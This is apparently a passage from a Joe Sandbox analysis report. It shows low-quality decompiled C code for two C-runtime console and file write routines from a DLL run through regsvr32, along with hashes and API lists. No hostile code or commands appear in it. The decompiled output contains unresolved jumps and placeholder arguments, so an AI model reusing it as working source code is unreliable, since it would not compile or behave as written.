                                                                                                                                                                                                            • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                            • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                            			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                                                                                                                            				void* __rdi;
                                                                                                                                                                                                            				void* __rsi;
                                                                                                                                                                                                            				void* __rbp;
                                                                                                                                                                                                            				intOrPtr _t183;
                                                                                                                                                                                                            				signed int _t187;
                                                                                                                                                                                                            				signed int _t194;
                                                                                                                                                                                                            				signed int _t199;
                                                                                                                                                                                                            				intOrPtr _t208;
                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                            				signed char _t211;
                                                                                                                                                                                                            				void* _t261;
                                                                                                                                                                                                            				signed long long _t262;
                                                                                                                                                                                                            				long long _t267;
                                                                                                                                                                                                            				long long _t269;
                                                                                                                                                                                                            				void* _t270;
                                                                                                                                                                                                            				long long _t272;
                                                                                                                                                                                                            				intOrPtr* _t278;
                                                                                                                                                                                                            				intOrPtr* _t285;
                                                                                                                                                                                                            				long long _t287;
                                                                                                                                                                                                            				long long _t313;
                                                                                                                                                                                                            				void* _t321;
                                                                                                                                                                                                            				long long _t322;
                                                                                                                                                                                                            				void* _t323;
                                                                                                                                                                                                            				long long _t324;
                                                                                                                                                                                                            				long long _t326;
                                                                                                                                                                                                            				signed char* _t327;
                                                                                                                                                                                                            				signed char* _t328;
                                                                                                                                                                                                            				signed char* _t329;
                                                                                                                                                                                                            				void* _t330;
                                                                                                                                                                                                            				void* _t331;
                                                                                                                                                                                                            				void* _t332;
                                                                                                                                                                                                            				signed long long _t333;
                                                                                                                                                                                                            				intOrPtr _t336;
                                                                                                                                                                                                            				intOrPtr _t339;
                                                                                                                                                                                                            				void* _t341;
                                                                                                                                                                                                            				signed long long _t343;
                                                                                                                                                                                                            				signed long long _t345;
                                                                                                                                                                                                            				long long _t354;
                                                                                                                                                                                                            				void* _t358;
                                                                                                                                                                                                            				long long _t359;
                                                                                                                                                                                                            				signed long long _t362;
                                                                                                                                                                                                            				char _t363;
                                                                                                                                                                                                            				signed long long _t364;
                                                                                                                                                                                                            				void* _t367;
                                                                                                                                                                                                            				signed char* _t368;
                                                                                                                                                                                                            				signed long long _t370;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t261 = _t332;
                                                                                                                                                                                                            				_t331 = _t261 - 0x57;
                                                                                                                                                                                                            				_t333 = _t332 - 0xd0;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                                                                                                                                            				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                                                                                                                                            				_t262 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                                                                                                                                            				_t278 = __rcx;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                                                                                                                                            				_t362 = __edx >> 6;
                                                                                                                                                                                                            				 *(_t331 - 0x39) = _t362;
                                                                                                                                                                                                            				_t370 = __edx + __edx * 8;
                                                                                                                                                                                                            				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                                                                                                                                            				r12d = r9d;
                                                                                                                                                                                                            				_t359 = _t358 + __r8;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                                                                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                                                                                                                                            				0x80006f60();
                                                                                                                                                                                                            				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                                                                                                                                            				 *((long long*)(__rcx)) = _t267;
                                                                                                                                                                                                            				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                                                                                                                                            				_t343 = __edx >> 6;
                                                                                                                                                                                                            				 *(_t331 - 0x11) = _t343;
                                                                                                                                                                                                            				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                                                                                                                                            				r12d = 1;
                                                                                                                                                                                                            				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                                                                                                                                            				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                                                                                                                                            				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                                                                                                                                            				_t367 = _t324 + 1;
                                                                                                                                                                                                            				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                                                                                                                                            				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                                                                                                                                            				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                                                                                                                                            				r12d = r12d + 1;
                                                                                                                                                                                                            				_t183 = r12d - 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                                                                                                                                            				_t336 = _t183;
                                                                                                                                                                                                            				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                                                                                                                                            				_t287 = _t324;
                                                                                                                                                                                                            				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                                                                                                                                            				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                                                                                                                                            				if (_t336 <= 0) goto 0x8000d74b;
                                                                                                                                                                                                            				0x80004b30();
                                                                                                                                                                                                            				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                                                                                                                                            				_t313 = _t324;
                                                                                                                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                                                                                                                                            				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                                                                                                                                            				_t269 = _t331 - 1;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                                                                                                                                            				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                                                                                                                                            				r12d = _t187;
                                                                                                                                                                                                            				r8d = _t187;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                                                                                                                            				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                                                                                                                                            				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                            				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                                                                                                                                            				goto 0x8000d8ae;
                                                                                                                                                                                                            				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                                                                                                                                            				_t210 = _t363 + 1;
                                                                                                                                                                                                            				_t270 = _t210;
                                                                                                                                                                                                            				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                                                                                                                                            				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                                                                                                                                            				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                                                                                                                                            				r14d = _t194;
                                                                                                                                                                                                            				r8d = _t194;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                                                                                                                            				_t345 = _t331 - 0x51;
                                                                                                                                                                                                            				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                                                                                                                                            				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                            				_t327 = _t326 + _t363;
                                                                                                                                                                                                            				r12d = r14d;
                                                                                                                                                                                                            				_t364 =  *(_t331 - 0x39);
                                                                                                                                                                                                            				goto 0x8000d8ae;
                                                                                                                                                                                                            				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                                                                                                                                            				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                                                                                                                                            				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                                                                                                                                            				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                                                                                                                                            				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                                                                                                                                            				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                                                                                                                                            				r8d = 2;
                                                                                                                                                                                                            				goto 0x8000d899;
                                                                                                                                                                                                            				r9d =  *_t327 & 0x000000ff;
                                                                                                                                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                                                                                                                                            				_t368 =  &(_t327[1]);
                                                                                                                                                                                                            				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                                                                                                                                            				r8d = 2;
                                                                                                                                                                                                            				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                            				_t328 = _t368;
                                                                                                                                                                                                            				goto 0x8000d8ae;
                                                                                                                                                                                                            				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                                                                                                                                            				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                            				_t329 =  &(_t328[1]);
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                                                                                                                                            				_t272 = _t331 + 0xf;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                                                                                                                                            				r9d = r12d;
                                                                                                                                                                                                            				_t341 = _t331 - 0x6d;
                                                                                                                                                                                                            				E0000000118000A154();
                                                                                                                                                                                                            				r14d = _t199;
                                                                                                                                                                                                            				if (_t199 == 0) goto 0x8000da03;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                                                                                                                            				r8d = _t199;
                                                                                                                                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                                                                                                                                            				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                                                                                                                                            				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                                                                                                                                            				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                                                                                                                            				_t130 = _t272 - 0xc; // 0x1
                                                                                                                                                                                                            				r8d = _t130;
                                                                                                                                                                                                            				_t321 = _t331 - 0x71;
                                                                                                                                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                                                                                                                                            				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                                                                                                                                            				goto 0x8000d681;
                                                                                                                                                                                                            				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                                                                                                                                            				_t330 = _t329 - _t368;
                                                                                                                                                                                                            				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                                                                                                                                            				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                                                                                                                                            				goto 0x8000da03;
                                                                                                                                                                                                            				if (_t341 <= 0) goto 0x8000d9da;
                                                                                                                                                                                                            				_t322 = _t324;
                                                                                                                                                                                                            				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                                                                                                                                            				_t323 = _t322 + 1;
                                                                                                                                                                                                            				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                                                                                                                                            				goto 0x8000da03;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                                                                                                                                            				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                                                                                                                                            				_t173 = _t323 + 1; // 0x1
                                                                                                                                                                                                            				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                                                                                                                                            				goto 0x8000da03;
                                                                                                                                                                                                            				 *_t278 = GetLastError();
                                                                                                                                                                                                            				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                                                                                                                                            			}

















































                                                                                                                                                                                                            0x18000d9b3
                                                                                                                                                                                                            0x18000d9c8
                                                                                                                                                                                                            0x18000d9cf
                                                                                                                                                                                                            0x18000d9d8
                                                                                                                                                                                                            0x18000d9da
                                                                                                                                                                                                            0x18000d9de
                                                                                                                                                                                                            0x18000d9e0
                                                                                                                                                                                                            0x18000d9ed
                                                                                                                                                                                                            0x18000d9f3
                                                                                                                                                                                                            0x18000d9f6
                                                                                                                                                                                                            0x18000d9f9
                                                                                                                                                                                                            0x18000da01
                                                                                                                                                                                                            0x18000da2c

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                            • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                                                                                            			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                                                                                                                            				signed long long _v88;
                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                            				void* _v108;
                                                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                                                            				long _v128;
                                                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                                                            				long long _v144;
                                                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                                                            				void* __rbx;
                                                                                                                                                                                                            				void* __rsi;
                                                                                                                                                                                                            				void* __rbp;
                                                                                                                                                                                                            				signed short _t99;
                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                            				long _t116;
                                                                                                                                                                                                            				signed int _t117;
                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                            				signed short _t127;
                                                                                                                                                                                                            				signed int _t130;
                                                                                                                                                                                                            				signed short _t133;
                                                                                                                                                                                                            				signed short _t159;
                                                                                                                                                                                                            				signed short _t167;
                                                                                                                                                                                                            				signed long long _t180;
                                                                                                                                                                                                            				signed int _t184;
                                                                                                                                                                                                            				signed short* _t197;
                                                                                                                                                                                                            				signed int _t204;
                                                                                                                                                                                                            				signed int _t205;
                                                                                                                                                                                                            				signed short* _t206;
                                                                                                                                                                                                            				void* _t208;
                                                                                                                                                                                                            				signed long long _t220;
                                                                                                                                                                                                            				void* _t221;
                                                                                                                                                                                                            				signed long long _t222;
                                                                                                                                                                                                            				signed long long _t223;
                                                                                                                                                                                                            				void* _t224;
                                                                                                                                                                                                            				signed short* _t226;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t197 = __rdx;
                                                                                                                                                                                                            				_t122 = __ebx;
                                                                                                                                                                                                            				r14d = r8d;
                                                                                                                                                                                                            				_t184 = __r9;
                                                                                                                                                                                                            				_t206 = __rdx;
                                                                                                                                                                                                            				if (r8d == 0) goto 0x8000e1d3;
                                                                                                                                                                                                            				if (__rdx != 0) goto 0x8000df47;
                                                                                                                                                                                                            				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                                                                                                                            				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                                                                                                                            				r9d = 0;
                                                                                                                                                                                                            				_v144 = __r9;
                                                                                                                                                                                                            				_v152 = _t205;
                                                                                                                                                                                                            				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                                                                                                                                            				goto 0x8000e1d5;
                                                                                                                                                                                                            				_t220 = __ecx >> 6;
                                                                                                                                                                                                            				_v88 = _t220;
                                                                                                                                                                                                            				_t223 = __ecx + __ecx * 8;
                                                                                                                                                                                                            				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                                                                                                                                            				_v136 = _t99;
                                                                                                                                                                                                            				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                                                                                                                                            				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                                                                                                                                            				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                                                                                                                                            				_t23 = _t197 + 2; // 0x2
                                                                                                                                                                                                            				r8d = _t23;
                                                                                                                                                                                                            				E0000000118000E958(r15d);
                                                                                                                                                                                                            				_v112 = _t205;
                                                                                                                                                                                                            				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                                                                                                                                            				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                                                                                                                                            				0x80006f60();
                                                                                                                                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                                                                                                                                            				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                                                                                                                                            				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                                                                                                                                            				_t127 = _v136;
                                                                                                                                                                                                            				_t159 = _t127;
                                                                                                                                                                                                            				if (_t159 == 0) goto 0x8000e099;
                                                                                                                                                                                                            				if (_t159 == 0) goto 0x8000e024;
                                                                                                                                                                                                            				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                                                                                                                                            				_t221 = _t206 + _t224;
                                                                                                                                                                                                            				_v128 = _t205;
                                                                                                                                                                                                            				_t226 = _t206;
                                                                                                                                                                                                            				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                                                                                                                                            				r14d = _v124;
                                                                                                                                                                                                            				_v136 =  *_t226 & 0x0000ffff;
                                                                                                                                                                                                            				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                                                                                                                                            				_t130 = _v136 & 0x0000ffff;
                                                                                                                                                                                                            				if (_t107 != _t130) goto 0x8000e087;
                                                                                                                                                                                                            				r14d = r14d + 2;
                                                                                                                                                                                                            				_v124 = r14d;
                                                                                                                                                                                                            				if (_t130 != 0xa) goto 0x8000e07c;
                                                                                                                                                                                                            				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                                                                                                                                            				r14d = r14d + 1;
                                                                                                                                                                                                            				_v124 = r14d;
                                                                                                                                                                                                            				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                                                                                                                                            				goto 0x8000e038;
                                                                                                                                                                                                            				_v128 = GetLastError();
                                                                                                                                                                                                            				_t222 = _v88;
                                                                                                                                                                                                            				goto 0x8000e153;
                                                                                                                                                                                                            				r9d = r14d;
                                                                                                                                                                                                            				_v152 = __r9;
                                                                                                                                                                                                            				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                                                                                                                                            				asm("movsd xmm0, [eax]");
                                                                                                                                                                                                            				goto 0x8000e158;
                                                                                                                                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                                                                                                                                            				_t133 = _v136;
                                                                                                                                                                                                            				_t167 = _t133;
                                                                                                                                                                                                            				if (_t167 == 0) goto 0x8000e10c;
                                                                                                                                                                                                            				if (_t167 == 0) goto 0x8000e0f8;
                                                                                                                                                                                                            				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                                                                                                                                            				r9d = r14d;
                                                                                                                                                                                                            				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                            				goto 0x8000e0b0;
                                                                                                                                                                                                            				r9d = r14d;
                                                                                                                                                                                                            				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                            				goto 0x8000e0b0;
                                                                                                                                                                                                            				r9d = r14d;
                                                                                                                                                                                                            				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                            				goto 0x8000e0b0;
                                                                                                                                                                                                            				r8d = r14d;
                                                                                                                                                                                                            				_v152 = _v152 & _t180;
                                                                                                                                                                                                            				_v128 = _t180;
                                                                                                                                                                                                            				_v120 = 0;
                                                                                                                                                                                                            				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
                                                                                                                                                                                                            				_t116 = GetLastError();
                                                                                                                                                                                                            				_v128 = _t116;
                                                                                                                                                                                                            				asm("movsd xmm0, [ebp-0x40]");
                                                                                                                                                                                                            				asm("movsd [ebp-0x30], xmm0");
                                                                                                                                                                                                            				if (_t116 != 0) goto 0x8000e1cc;
                                                                                                                                                                                                            				_t117 = _v112;
                                                                                                                                                                                                            				if (_t117 == 0) goto 0x8000e1a3;
                                                                                                                                                                                                            				if (_t117 != 5) goto 0x8000e193;
                                                                                                                                                                                                            				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
                                                                                                                                                                                                            				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                                                                                                                            				 *(_t184 + 0x34) = _t117;
                                                                                                                                                                                                            				goto 0x8000df3f;
                                                                                                                                                                                                            				_t204 = _t184;
                                                                                                                                                                                                            				E000000011800086B0(_v112, _t204);
                                                                                                                                                                                                            				goto 0x8000df3f;
                                                                                                                                                                                                            				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
                                                                                                                                                                                                            				if ( *_t206 == 0x1a) goto 0x8000e1d3;
                                                                                                                                                                                                            				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
                                                                                                                                                                                                            				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
                                                                                                                                                                                                            				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                                                                                                                            				goto 0x8000df3f;
                                                                                                                                                                                                            				goto 0x8000e1d5;
                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                            			}







































                                                                                                                                                                                                            0x18000e17c
                                                                                                                                                                                                            0x18000e180
                                                                                                                                                                                                            0x18000e187
                                                                                                                                                                                                            0x18000e18b
                                                                                                                                                                                                            0x18000e18e
                                                                                                                                                                                                            0x18000e196
                                                                                                                                                                                                            0x18000e199
                                                                                                                                                                                                            0x18000e19e
                                                                                                                                                                                                            0x18000e1ad
                                                                                                                                                                                                            0x18000e1b2
                                                                                                                                                                                                            0x18000e1b4
                                                                                                                                                                                                            0x18000e1b8
                                                                                                                                                                                                            0x18000e1bc
                                                                                                                                                                                                            0x18000e1c3
                                                                                                                                                                                                            0x18000e1c7
                                                                                                                                                                                                            0x18000e1d1
                                                                                                                                                                                                            0x18000e1e5

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                            • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
